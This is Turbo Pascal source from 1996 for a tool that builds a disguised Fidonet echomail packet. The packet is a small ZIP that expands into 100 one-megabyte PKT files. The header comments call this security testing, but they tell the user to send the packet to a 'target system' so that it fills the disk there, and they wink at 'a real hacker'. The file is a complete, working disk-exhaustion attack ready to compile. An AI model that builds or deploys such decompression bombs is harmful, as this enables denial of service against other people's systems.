(* *) (* MAKEA.PAS - A Turbo Pascal Program for testing Fidonet echomail security *) (* *) (* This program was written and tested in Turbo Pascal 7, it should compile *) (* fine in TP5.5 and 6 if that's what you have. This file should compile *) (* right "out of the box" without modification; if it doesn't you might have *) (* a hacked or corrupted copy. *) (* *) (* This program aids in testing the security of echomail systems in Fidonet *) (* by creating a valid ZIP archive echomail packet. This packet appears *) (* relatively innocuous at about 100k in size (typical for many echomail *) (* systems) but it contains PKT files which expand to a megabyte apiece. *) (* Up to 100 of these 1 meg files will be created, if the target system's *) (* hard drive has enough space. Fortunately, only one 1MB file is created *) (* on your system when you run the program. You should have 1.5 MB free. *) (* *) (* To test the security of another system, take the following steps: *) (* *) (* (1) Compile and run this program. It will create a packet file calling *) (* PKZIP.EXE (if found on your path). This operation will take several *) (* minutes, depending on the speed of your system. *) (* *) (* (2) File-attach the file to the target system. It is very important *) (* that you use your own mailer with all your addresses intact and that you *) (* not use Caller-ID blocking, so that the target sysop knows that this is *) (* only a test and not an actual attack by a crasher. *) (* *) (* That's it. If the target system's echomail processor is insecure, there *) (* will be up to 100 megs of .PKT files in the target's echomail directory. *) (* If you are worried you might fill the target's hard disk during this *) (* test, you should modify the program so as to decrease the number of files *) (* added to the packet or the size of those files. A larger number of small *) (* files will result in a larger packet size, and unfortunately, a higher *) (* likelihood that the test will *completely* fill the hard drive should the *) (* target be careless enough not to have 100 megs free. And of course, NEVER*) (* send such a packet to someone who is unaware that you are conducting a *) (* security test or at a time when the target sysop is unlikely to be *) (* present to delete the .PKT files! *) (* *) (* This program is presented in source form because: *) (* *) (* - this way you know for sure it has no virii or trojan surprises *) (* *) (* - you can totally reconfigure it or add features *) (* *) (* - it's free and I don't care who hacks it up or how *) (* *) (* - a real hacker has at least the minimal programming skill needed to *) (* compile a pascal program! *) (* *) (* *) (* Program and DoubleSpeak Docs [K] KopyLeft 1996 The Kopyleftist *) (* *) {$M 8192,0,0} uses dos; var i:longint; name,nextname:string; zipexe:string; procedure make1megfile(filename:string); {makes a 1 meg file full of 6's} var f:text; begin assign(f,filename); rewrite(f); for i:=1 to 10000 do write(f,'6666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666'); flush(f); close(f); end; procedure add2zip(zipname,filename:string); var c,p:string; begin c:=zipexe; p:=zipname+' '+filename; swapvectors; exec(c,p); swapvectors; end; procedure _rename(oldname,newname:string); var f:file; begin assign(f,oldname); rename(f,newname); end; procedure getzipexe; var s:pathstr; begin s:=fsearch('PKZIP.EXE',getenv('PATH')); if s='' then begin writeln('Unable to locate PKZIP.EXE in path!'); halt; end; zipexe:=s; end; begin writeln('Makea by The Kopyleftist'); getzipexe; name:='1.PKT'; writeln('Creating prototype file...'); make1megfile(name); writeln('Adding 100 copies to bogus echomail packet zipfile 0000FFFF.MO0...'); add2zip('0000FFFF.MO0',name); for i:=2 to 100 do begin str(i,nextname); nextname:=nextname+'.PKT'; _rename(name,nextname); name:=nextname; add2zip('0000FFFF.MO0',name); end; end. (* Uploaded to: Tommy's Holiday Camp BBS 1-604-361-4549 *)